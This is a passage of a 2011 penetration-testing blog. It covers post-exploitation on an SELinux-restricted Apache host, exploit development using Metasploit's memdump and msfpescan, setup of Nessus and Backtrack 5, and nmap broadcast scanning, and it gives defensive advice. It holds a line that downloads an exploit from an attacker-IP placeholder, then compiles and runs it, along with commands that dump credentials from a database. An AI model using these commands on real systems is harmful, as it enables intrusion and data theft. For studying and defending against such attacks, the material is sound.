So, let's say that the attacker manages to get a reverse-shell as the "apache" user. All is not lost because this shell is very limited, firstly by the rights of apache, and secondly by SELinux.<br />
<br />
The attacker is limited to the type of commands they can run, and what they can see. They are in a jail, and they are trying to dig their way out...<br />
<br />
<b><br />
What can the attacker do?</b><br />
<br />
If some commands are possible for the attacker he will try to enumerate his way around the operating system, looking for holes.</attackers><br />
<br />
<attackers port=""></attackers><br />
<attackers port="">Oddly, on RedHat (or Centos) as of 4.8 or 5.6, even though "/bin/ls" is blocked by SELinux by default "/usr/bin/dir" is not.<br />
<br />
So whilst an attacker can't do:<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">/bin/ls -al /tmp</span><br />
<br />
The can do:<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">/usr/bin/dir -al /tmp</span><br />
<br />
However "dir" is more limited than "ls" and does not give the file-ownership and rights for files "apache" does not own. It can enable an attacker to enumerate files and directories (rather than fumbling their way around in the dark) so the attacker can continue to enumerate the system.<br />
<br />
Also, with SELinux, both "ls" and "dir" support the -Z option, which shows the SELinux context for files and directories. (However note that; each of the lines with a "?" will trigger an SELinux alert)</attackers><br />
<attackers port=""></attackers><br />
<attackers port=""></attackers><br />
<attackers port=""><span style="font-family: "Courier New",Courier,monospace;">dir -alZ</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">drwxrwxrwt root root system_u:object_r:tmp_t:s0 .</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">drwxr-xr-x root root system_u:object_r:root_t:s0 ..</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">?--------- ? ? .ICE-unix</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">?--------- ? ? .X0-lock</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">?--------- ? ? .X11-unix</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">?--------- ? ? .font-unix</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">?--------- ? ? .gdm_socket</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">?--------- ? ? VMwareDnD</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">drwxr-xr-x apache apache root:object_r:tmp_t:s0 enlightenment</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">drwx------ centos centos user_u:object_r:tmp_t:s0 gconfd-centos</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">drwx------ root root root:object_r:tmp_t:s0 gconfd-root</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">?--------- ? ? ks-script-6qJjjE</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">?--------- ? ? ks-script-6qJjjE.log</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">?--------- ? ? libno_ex.so.1.0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">?--------- ? ? mapping-centos</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">?--------- ? ? mapping-root</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">-rwxr-xr-x apache apache root:object_r:httpd_tmp_t:s0 nc</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">drwx------ centos centos user_u:object_r:tmp_t:s0 vmware-centos</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">?--------- ? ? vmware-root</span><br />
<br />
The attacker can confirm if SELinux is enabled, by running:<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">sestatus -v</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> </span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> SELinux status: enabled</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> SELinuxfs mount: /selinux</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Current mode: unknown (Permission denied)</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Mode from config file: error (Permission denied)</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Policy version: unknown (Permission denied)</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Policy from config file: targeted</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> </span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Process contexts:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Current context: system_u:system_r:httpd_t:s0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Init context: unknown (Permission denied)</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> </span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> File contexts:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Controlling term: unknown (Bad address)</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> /etc/passwd system_u:object_r:etc_t:s0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> /bin/bash system_u:object_r:shell_exec_t:s0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> /bin/sh system_u:object_r:bin_t:s0 -> system_u:object_r:shell_exec_t:s0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> /lib/libc.so.6 system_u:object_r:lib_t:s0 -> system_u:object_r:lib_t:s0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> /lib/ld-linux.so.2 system_u:object_r:lib_t:s0 -> system_u:object_r:ld_so_t:s0</span><br />
<br />
There are often lots of anomalies in SELinux policies, which can help an attacker get a bigger foothold on a system.</attackers><br />
<br />
<attackers port="">On RedHat 5.6 for example, by default the attacker can also use several other useful commands such as:<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">uname -a</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Linux localhost.localdomain 2.6.18-238.12.1.el5 #1 SMP Tue May 31 13:23:01 EDT 2011 i686 athlon i386 GNU/Linux</span><br />
<br />
..in order to enumerate the system version and kernel - before attempting kernel exploits.<br />
<br />
The attacker can use "wget", or "echo", and "chmod" to write executable files into a directory such as "/tmp/".</attackers><br />
<attackers port=""><br />
</attackers><br />
Also, in my tests I could use gcc to compile source code for exploits on the system. For example:<attackers port=""></attackers><br />
<br />
<div style="font-family: "Courier New",Courier,monospace;"><attackers port="">cd /tmp</attackers></div><div style="font-family: "Courier New",Courier,monospace;"><attackers port="">wget http://</attackers><span style="font-family: "Courier New",Courier,monospace;">-attackersip-</span><attackers port=""><attackersip>/exploit.c</attackersip></attackers></div><div style="font-family: "Courier New",Courier,monospace;"><attackers port="">gcc exploit.c -o exploit</attackers></div><attackers port=""><span style="font-family: "Courier New",Courier,monospace;">./exploit</span></attackers><br />
<br />
<attackers port=""></attackers><attackers port="">Unchecked, it is likely that a highly skilled attacker will eventually find a privilege escalation exploit that works.</attackers><br />
<attackers port=""><br />
However, there are lots of commands that will fail because of SELinux, and these failures get logged.<br />
<br />
<br />
<b>Detecting the attack with logging</b><br />
<br />
Meanwhile the attackers failed command attempts are getting logged by SELinux, and if savvy administrators have alerting configured, or regularly check all their logs, the hacking attempts can be detected.</attackers><br />
<br />
<attackers port="">In reality system administrators are very busy, so these are big ifs (unless fully configured SIEM systems are deployed).<br />
<br />
For SELinux logging, if the auditing daemon is running (as it is by default on RedHat) then these messages will be in "/var/log/audit/audit.log" (otherwise "/var/log/messages", both of which should only be accessible by privileged users).<br />
<br />
To manually search this log for failures in the context of the web-server you could do something like<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">cat /var/log/audit/audit.log | grep "type=AVC" | cut -d":" -f4</span></attackers><br />
<br />
<attackers port=""><span style="font-family: "Courier New",Courier,monospace;"> <span style="color: #cc0000;">denied</span> { getattr } for pid=20137 comm="bash" path="<span style="color: #cc0000;">/bin/rpm</span>" dev=sda2 ino=351687 scontext=system_u </span><br />
<br />
</attackers><br />
<attackers port=""></attackers><br />
<attackers port="">It is possible for an attacker to work away without triggering any SELinux alerts, but it is very difficult, and ideally an attacker needs a replica system which has a very similar policy to practise on.</attackers><br />
<br />
<attackers port=""></attackers><br />
<attackers port="">It's a bit like playing the game operation... one false move and bzzzt... the alarm goes off.</attackers><br />
<attackers port=""></attackers><br />
<attackers port=""></attackers><br />
<attackers port=""></attackers><br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhC9TI10yHSi_Ohu9BsZnT83XZ40JW6NXsmKZ1zAh6YXHhQPQyE6f4QZ2VKv_ht954J5cHcbCilIeIll2ksm55wJR8uDdBhTFBV05eVwBowGyrq6H2C5pT2Dg7pDsnga9VrEcn_2FWg964/s1600/opperation.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhC9TI10yHSi_Ohu9BsZnT83XZ40JW6NXsmKZ1zAh6YXHhQPQyE6f4QZ2VKv_ht954J5cHcbCilIeIll2ksm55wJR8uDdBhTFBV05eVwBowGyrq6H2C5pT2Dg7pDsnga9VrEcn_2FWg964/s320/opperation.jpg" width="320" /></a></div><attackers port=""><br />
<b>More subtle attacks</b><br />
<br />
However, even if direct privilege-escalation is not possible, with a remote shell as "apache", an attacker can do lots of things in the context of the web-server. Dependent on how the website and databases are configured, other attacks may be possible (even if the server is not fully compromised).<br />
<br />
Examples of this could include active-session hijacking using server-side tokens in "/var/lib/php/session/" or "/tmp". This may allow an attacker to gain enough information to login to the website as active users, and attack their accounts.</attackers><br />
<br />
<attackers port="">This can often be done simply by using an attacking proxy (such as burp) to add the gained session token to a browser session. Of course, this can also be scripted to enable fast attacks against any active users.</attackers><br />
<attackers port=""><br />
</attackers><br />
<br />
<b>Attacking via the database</b><br />
<br />
Alternatively, running in the context of the web-server it is always possible to view other sensitive information, such as server-side code (PHP for example) and steal login details for the database.<br />
<br />
<attackers port="">The attacker could then proceed to attack the database, to steal information, or to write and read files on the filesystem as the database user.</attackers><br />
<br />
<attackers port="">If an attacker could get login details for a mysql database from server-side code, they could execute SQL queries such as:<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">mysql --user=databaseuser --password='password' websitedb -e "select * from users;"> output.txt</span><br />
<br />
Alternatively, they could read or write files as the mysql user, which may help in their escalation process.<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">mysql </span></attackers><span style="font-family: "Courier New",Courier,monospace;">--user=databaseuser --password='password' websitedb</span><attackers port=""><span style="font-family: "Courier New",Courier,monospace;"> -e "SELECT 'whatever data you like' INTO OUTFILE '/tmp/test';"</span><br />
</attackers><br />
<br />
<attackers port="">If the database is running as "root", then you can probably see how this could lead to a full system compromise. (The database could be on another system, in which case it is this secondary system that could be compromised.)</attackers><br />
<br />
<attackers port=""></attackers><attackers port="">SELinux can't prevent access to the database for "apache", because the website user needs to interact with it in order for the site to work, but maybe some of these other commands can be locked-down with a tougher SELinux policy.</attackers><br />
<attackers port=""><br />
<br />
<b>What can you do about these issues? Add more security...</b><br />
<br />
1) Identify and fix the website vulnerabilities.<br />
<br />
This could be a difficult and lengthy process, which requires a high level of skill, especially in a custom-built websites, but should be done.<br />
<br />
2) Limit outbound connections from the web-server on a firewall</attackers><br />
<br />
<attackers port="">For example for the web-server to be only allowed outbound access, just on port 80, and via a web-proxy that has some content-security.</attackers><br />
<br />
<attackers port="">3) Checking logs and reacting to security incidents</attackers><br />
<br />
<attackers port="">Should be done regularly, but is often omitted. Some sysadmins are unaware of the issues.</attackers><br />
<br />
<attackers port="">4) Run the database, the web-server, and any other services with restricted service accounts, such as "apache", "mysql", "ftp".</attackers><br />
<br />
<attackers port=""></attackers><attackers port="">Never use root, this makes a Hackers life too easy</attackers><br />
<br />
<attackers port="">5) Deploy a tougher SELinux policy to block more commands for the web-server and database users</attackers><br />
<br />
<attackers port=""></attackers><attackers port="">This can be difficult to do, and I would not suggest doing it to a production server without thorough testing beforehand. SELinux is complex and you can easily mess-up a live system with a simple oversight.</attackers><br />
<br />
<attackers port="">6) Have a look in your "/tmp" directories every now and then</attackers><br />
<attackers port=""> </attackers><br />
<attackers port="">If hackers are messy, they may well have left something behind.</attackers><br />
<br />
<attackers port="">7) Run a host-based or network-based IDS</attackers><br />
<br />
<attackers port="">Deploying an Intrusion Detection System (like snort for example) can alert you to common signatures from hacker activity.</attackers>Benhttp://www.blogger.com/profile/12120787183871800863noreply@blogger.com9tag:blogger.com,1999:blog-6428740549041097500.post-43652944647864656312011-06-15T17:51:00.003+01:002011-06-16T10:32:25.364+01:00Scapy packet forging, and writing multi-threaded networking scripts with PythonJust a quick post on a couple of great videos I found.<br />
<br />
If you are interested in using python for exploit-development of network services this may be helpful.<br />
<br />
This is the start of what looks like a great series of videos from Rene Schallner and Patrick Schallner, on Python skills for hacking.<br />
<br />
It looks like they will be covering useful techniques in a good deal of depth (good for me anyway) and think they will be releasing more videos over the next few weeks on <a href="http://securitytube.net/">securitytube.net</a><br />
<br />
<br />
<br />
<br />
<b>First video</b><br />
<br />
This video covers the basics of running scapy, and basic python scripts to emulate a server and client.<br />
<br />
<iframe frameborder="0" height="225" src="http://player.vimeo.com/video/24570637" width="400"></iframe><br />
<br />
<br />
<br />
<b>Second video</b><br />
<br />
After the basics in video one, this second video gets much more in-depth; implementing multi-threaded clients and servers, and using scapy to capture, edit and replay packets to replicate malicious traffic.<br />
<br />
<iframe frameborder="0" height="225" src="http://player.vimeo.com/video/24763819" width="400"></iframe><br />
<br />
It looks like there will be several more of these videos to come.<br />
(Keep up the good work Rene and Patrick. Your videos are great so far!)<br />
<br />
<br />
<b>Scapy documentation</b><br />
<br />
Additionally, there is a great set of online documentation of scapy at the following location:<br />
<a href="http://www.secdev.org/projects/scapy/doc/index.html">http://www.secdev.org/projects/scapy/doc/index.html</a>Benhttp://www.blogger.com/profile/12120787183871800863noreply@blogger.com6tag:blogger.com,1999:blog-6428740549041097500.post-88714553169023000282011-05-23T15:08:00.006+01:002011-06-13T14:01:41.676+01:00Finding alphanumeric jump addresses for buffer-overflow exploit developmentBuffer-overflow exploit-development can sometimes be challenging for services which use protocols that have restricted character-sets.<br />
<br />
In a previous blog on <a href="http://insidetrust.blogspot.com/2011/02/using-backtrack-to-spot-bad-characters.html">bad-characters</a>, I talked about ways to encode payloads so that problem special characters can be avoided in exploit payloads.<br />
<br />
Whilst that is fine for "introducing" code to the target system, an attacker also needs to hijack code execution to run the malicious payload. This is done by controlling EIP through putting a jump address within the buffer. This jump address perfectly overwrites EIP, (either directly as part of the function epilogue, or via a Structured Exception Handler) to redirect code execution to the malicious payload.<br />
<br />
For very restrictive protocols (text-only for example) finding a working jump address in memory can be challenging.<br />
<br />
Here is one approach to finding useable jump addresses, using a couple of Metasploit tools (and a bit of grepping).<br />
<br />
<span style="color: #cc0000;">Please remember to use these techniques only for legitimate educational and testing purposes and not maliciously.</span><br />
<br />
<br />
<b>Dumping memory</b><br />
<br />
In this example, I am experimenting with a Windows application crash.<br />
<br />
We can dump all the accessible memory for the target process, using memdump.exe, which is available in the MSF included with Backtrack 5 in the following directory:<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">/pentest/exploits/framework3/tools/memdump/</span><br />
<br />
This tool needs to be transfered to the target Windows system and run on the target process in its crashed state, as follows:<br />
<br />
<div style="font-family: "Courier New",Courier,monospace;">memdump.exe <process id> <output dir></div><br />
This produces a directory full of files which can then be zipped, and transferred back to the Backtrack 5 system and unpacked.<br />
<br />
<br />
<b>Scanning the dump</b><br />
<br />
To scan this process dump, we can use msfpescan to extract the jump addresses, from the memory locations which were available to the process.<br />
<br />
This example would find a pop, pop, ret, for a SEH exploit: <br />
<br />
<br />
<div style="font-family: "Courier New",Courier,monospace;"><span style="font-family: "Courier New",Courier,monospace;">/pentest/exploits/framework3/</span>msfpescan -p -M ./dumpdir > scanresults.txt</div><br />
Or here for example we look for the classic "jmp esp": <br />
<br />
<br />
<br />
<div style="font-family: "Courier New",Courier,monospace;"><span style="font-family: "Courier New",Courier,monospace;">/pentest/exploits/framework3/</span>msfpescan -j esp -M ./dumpdir > scanresults.txt</div><br />
<br />
We can then sort through the results to remove addresses with characters that cannot be used in a restricted buffer<br />
<br />
<br />
<b>Removing unusable addresses</b><br />
<br />
<br />
Grep can be used to filter these results in various ways. <br />
<br />
Here we grep to remove addresses that contain null bytes, or 0x0a, and 0x0d (CR/LF characters).<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">cat scanresults.txt | grep ^0x | grep -v "^0x00\|0a\|0d" | grep -v "^0x..00\|0a\|0d" | grep -v "^0x....00\|0a\|0d" | grep -v "^0x......00\|0a\|0d" | sort</span><br />
<br />
<br />
<br />
<br />
Here we grep for addresses which don't have any non-alphanumeric in any of the 4 octets:<br />
<br />
<div style="font-family: "Courier New",Courier,monospace;">cat scanresults.txt | grep ^0x | grep -v "^0x[0-2\|8-9\|a-f]\|3a\|3b\|3c\|3d\|3e\|3f\|40\|5b\|5c\|5d\|5e\|5f\|60\|7b\|7c\|7d\|7e\|7f" | grep -v "^0x..[0-2\|8-9\|a-f]\|3a\|3b\|3c\|3d\|3e\|3f\|40\|5b\|5c\|5d\|5e\|5f\|60\|7b\|7c\|7d\|7e\|7f" | grep -v "^0x....[0-2\|8-9\|a-f]\|3a\|3b\|3c\|3d\|3e\|3f\|40\|5b\|5c\|5d\|5e\|5f\|60\|7b\|7c\|7d\|7e\|7f" | grep -v "^0x......[0-2\|8-9\|a-f]\|3a\|3b\|3c\|3d\|3e\|3f\|40\|5b\|5c\|5d\|5e\|5f\|60\|7b\|7c\|7d\|7e\|7f" | sort</div><br />
(That last one looks a bit horrible. There may be a shorter way to grep this, but this is effective as a cut'n'paste hack)<br />
<br />
<br />
The results look like this:<br />
<br />
<div style="font-family: "Courier New",Courier,monospace;">0x74723956 pop esi; pop ebp; retn 0x0004<br />
0x74724a6b pop esi; pop ebp; retn 0x0004<br />
0x74734e36 pop esi; pop ebp; retn 0x000c<br />
0x7473526c pop esi; pop ebp; retn 0x000c</div><div style="font-family: "Courier New",Courier,monospace;">etc...</div><br />
<br />
As you can see, these addresses contain only the usable characters.<br />
<br />
So it would then be just a question of cross-referencing these addresses with the dlls you want to use (based on various criteria such as portability and protection bypass) and choosing ones that will work for the exploit.Benhttp://www.blogger.com/profile/12120787183871800863noreply@blogger.com2tag:blogger.com,1999:blog-6428740549041097500.post-68176648918909463542011-05-20T07:59:00.005+01:002011-08-29T10:27:20.750+01:00Easy Nessus scan for a beginner with Backtrack 5I have got to say that the inclusion of Nessus in Backtrack 5 is great. This makes performing a basic vulnerability scan easy.<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjICgtcfBwfY3LzOYX4d9QjDOS5F2Z35uwxNVwYCTnYG9iXle-Us35xojbAAzOZZyGqfzOfZlJ_q2dtCR24vPe5O1dtL1el7h8rhiOKtfBfmTkufGd9OpHO-k1vqzkDY4j0lIcfCSLazqs/s1600/nessus.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="262" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjICgtcfBwfY3LzOYX4d9QjDOS5F2Z35uwxNVwYCTnYG9iXle-Us35xojbAAzOZZyGqfzOfZlJ_q2dtCR24vPe5O1dtL1el7h8rhiOKtfBfmTkufGd9OpHO-k1vqzkDY4j0lIcfCSLazqs/s400/nessus.png" width="400" /></a></div><br />
<br />
<span class="Apple-style-span" style="color: #cc0000;">UPDATE</span>: - In Backtrack 5 R1 you will need to additionally download and install Nessus, which I have briefly described in the following post<br />
<br />
<a href="http://insidetrust.blogspot.com/2011/08/setting-up-nessus-in-backtrack-5-r1.html">http://insidetrust.blogspot.com/2011/08/setting-up-nessus-in-backtrack-5-r1.html</a><br />
<br />
<br />
<b>The rest of the setup</b><br />
<br />
<br />
1) Get a free home-use key on the <a href="http://www.nessus.org/products/nessus/nessus-plugins/obtain-an-activation-code%20">Tenable/Nessus</a> website<br />
<br />
<br />
2) Enter the key as follows<br />
<br />
<br />
<span style="font-family: 'Courier New', Courier, monospace;">/opt/nessus/bin/nessus-fetch --register xxxx-xxxx-xxxx-xxxx<your here="" key=""></your></span><br />
<br />
<br />
3) Create a user and password (and hit enter to skip the rules)<br />
<br />
<span style="font-family: 'Courier New', Courier, monospace;">/opt/nessus/sbin/nessus-adduser</span><br />
<br />
<br />
4) Start the service<br />
<br />
<span style="font-family: 'Courier New', Courier, monospace;">/etc/init.d/nessusd start</span><br />
<br />
<br />
5) Start the scan, and view the report<br />
<br />
<span style="font-family: 'Courier New', Courier, monospace;"></span><span style="font-family: 'Courier New', Courier, monospace;">https://localhost:8834/</span><span style="font-family: 'Courier New', Courier, monospace;"></span><br />
<span style="font-family: 'Courier New', Courier, monospace;"></span><br />
<br />
The Nessus user-interface is so straight-forward that don't think there is any point in me describing where to click or what to put in. Just play with it for a minute or two and you should see how it works.<br />
<br />
Using Nessus to scan a set of machines really is a no-brainer. Here is a sample report (This XP systems needs patching ;o)<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyNKlVNyalYqMMmzeqHygbLallKMbm142s4kY9vKUYvLlp9MKJdAtmVrxNs8bmwdE8Oxh0TgNds0Cr4sbOwo1ENUmeYshXpvNeyQkjU_pqDgttemQ8MgpZ8W8aMqSDbq63qaw9Fr5x074/s1600/nessus1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="386" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyNKlVNyalYqMMmzeqHygbLallKMbm142s4kY9vKUYvLlp9MKJdAtmVrxNs8bmwdE8Oxh0TgNds0Cr4sbOwo1ENUmeYshXpvNeyQkjU_pqDgttemQ8MgpZ8W8aMqSDbq63qaw9Fr5x074/s400/nessus1.png" width="400" /></a></div><br />
Whilst this is no substitute for a Penetration test, a basic vulnerability scan can certainly help identify computers that are missing patches, or have poor configurations.<br />
<div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"></div>Benhttp://www.blogger.com/profile/12120787183871800863noreply@blogger.com9tag:blogger.com,1999:blog-6428740549041097500.post-13708088191733361212011-05-19T18:27:00.012+01:002011-08-28T20:18:35.917+01:00Overcoming problems installing Backtrack 5 on a systemI had a challenging couple of hours today getting Backtrack 5 running on my main Desktop system.<br />
<br />
Having tried the VMs, and and also installed the 32bit KDE version on one of my laptops (both of which were very straight forward) I thought I would bite-the-bullet, backup the data from my main research system, blow it away, and install Backtrack Linux 5 on that as well.<br />
<br />
Unfortunately I ran into a few issues, with installation drives, and graphics drivers.<br />
<br />
So here are some notes on solutions (more for me to remember than anything, but may be helpful to someone else?)<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhz8-fYFYCcN8manDEOHQrGfpRCyV9UjALEyuzlNpMcalT3PieR_0G2oB_mN2Kak3fur9WpH6nWlYctZpzE_GlAqYp6rj5EMnWXPWS2_uKgWYWRnrKedgUIrTM6n5bm7SrWqNOQeBHU_lo/s1600/bt5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="275" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhz8-fYFYCcN8manDEOHQrGfpRCyV9UjALEyuzlNpMcalT3PieR_0G2oB_mN2Kak3fur9WpH6nWlYctZpzE_GlAqYp6rj5EMnWXPWS2_uKgWYWRnrKedgUIrTM6n5bm7SrWqNOQeBHU_lo/s400/bt5.png" width="400" /></a></div><b>Boot-loader issues</b><br />
<br />
There seems to be something odd about the partitioning and boot-loader installation in Backtrack 5. I have multiple drives, one of which is a striped-pair. It didn't seem to be writing the boot-loader to the correct drive. Not sure why, but to work around this, I popped out the cables for my RAID array disks, and installed on the single 500GB OS disk (with no other live disks in the chassis at the time) and that seemed to resolve it.<br />
<br />
<br />
<b>Graphics-driver woes</b><br />
<br />
I have an on-board Nvidia card, which I know has produced some issues before, with my Backtrack 4 R2 install. No surprise, I needed to do some extra fiddling again to get this to work.<br />
<br />
After the install, "startx" was crashing-out with various errors telling me that there were no suitable devices for X to run on.<br />
<br />
(This was despite the fact that graphics drivers on the live DVD were working fine) <br />
<br />
The solution to this was to use a proprietary Nvidia driver-installation script. This also requires the kernel-sources to be downloaded and unpacked as follows:<br />
<br />
<div style="font-family: "Courier New",Courier,monospace;">prepare-kernel-sources</div><br />
(If you need to do this, go and make a cup of tea while this downloads and unpacks) <br />
<br />
<div style="font-family: "Courier New",Courier,monospace;">cd /usr/src/linux</div><div style="font-family: "Courier New",Courier,monospace;">cp -rf include/generated/* include/linux/</div><br />
However, the configuration script I had previously used with Backtrack 4 R2 (NVIDIA-Linux-x86-195.36.24-pkg1.sh) did not work, but luckily a more recent script did (NVIDIA-Linux-x86-270.41.19.run).<br />
(I hadn't been able to get that one working with Backtrack 4 R2)<br />
<br />
I then ran the Nvidia driver install as follows, and bingo, it worked:<br />
<br />
<span style="font-family: 'Courier New', Courier, monospace;">./NVIDIA-Linux-x86-270.41.19.run --kernel-source-path='/usr/src/linux'</span><br />
<br />
You can get the latest drivers from here: <a href="http://www.nvidia.com/object/unix.html">http://www.nvidia.com/object/unix.html</a><br />
<br />
<br />
<b>Setting up the rest of my lab</b><br />
<br />
The VMWare-player install went seemlessly (just using the "VMware-Player-3.1.4-385536.i386.bundle" script file from the VMware website) and I have copied on my archived virtual-victim-lab.<br />
<br />
So now I have a working online Backtrack 5. Hurrah!<br />
<br />
Here are a few extras I have installed:<br />
<br />
<span style="font-family: 'Courier New', Courier, monospace;">apt-get -y install gns3 openoffice.org tftp vlc gimp vsftpd xchat kcalc mplayer kate okular uml-utilities ktorrent k3b kmag ksnapshot</span><br />
<br />
<br />
Now it's just a question of getting used to KDE 4.5 (which seems quite different to KDE 3.x).<br />
<br />
<br />
<b>Missing things</b><br />
<br />
There seem to be some other things that I am used to seeing on Backtrack 4, that are either not there, or have changed significantly, I guess I will figure those out my immersing myself with some exploit development over the next few days.<br />
<br />
Anyway, time for some pwnage...Benhttp://www.blogger.com/profile/12120787183871800863noreply@blogger.com17tag:blogger.com,1999:blog-6428740549041097500.post-74165174561196070792011-05-18T11:16:00.005+01:002011-05-18T21:17:59.339+01:00Nmap nse broadcast scanning in Backtrack 5One of the more recent developments in nmap, over the past couple of years, is the addition of nmap nse scripts making nmap a much more flexible and expandable network-mapper and vulnerability-scanner (it seems like there are many more scripts being contributed with every release).<br />
<br />
There are now over 170 different scripts included by default in nmap. (I've been playing with nmap version 5.51, which comes with Backtrack 5)<br />
<br />
One of the more interesting new types of nse scripts are the broadcast discovery scripts, which I feel are certainly very interesting currently. To me, it looks like these new scanning techniques will become much more important in the future, as more IPv6 is deployed and used, and IPv4 gradually wanes. (though I do think some IPv4 could be around for another 15-20 years, these protocols will gradually decrease in importance)<br />
<br />
IPv6-only networks mean a lot of changes in the way hosts can be discovered, as scanning entire net-blocks will become much more difficult due to the vast size of the address-space, but broadcast scanning, and passive sniffing can help identify IPv6 systems.<br />
<br />
I've seen it reported that "nse broadcast-scans, are stealthy because they are passive". This is not true, they are still active scans. However, they are very low traffic scans, which attempt to discover network services using inbuilt ease-of-use functionality in the target network. (This type of scanning is perhaps something that could be done early in reconnaissance or discovery as a first network scan.)<br />
<br />
<br />
<b>What are broadcast scans?</b><br />
<br />
Rather than UDP or TCP port-scans or network scans using ICMP or ARP, broadcast scans are a lot less intrusive. Think of broadcast scans as nmap saying:<br />
<br />
"Hi there. I'm new on the network. Do any computers out there have any services I might want to use?"<br />
<br />
Whilst this sounds a bit dumb from a security perspective, there are lots of computers and various protocols that could respond, even systems that have firewalls enabled with all ports blocked will respond in some cases.<br />
<br />
From a network visibility perspective, we are also talking about only a very few packets per protocol, rather than the thousands required for a port-scan, and these "conversations" should be normal on the network, so this is much less likely to be detected by network security software.<br />
<br />
I set up a couple of systems in my test network. Broadcast scans don't need an IP address range. They are simply run like this:<br />
<br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">nmap -P0 --script=broadcast</span><br />
<br />
..and here is one of my initial results<br />
<br />
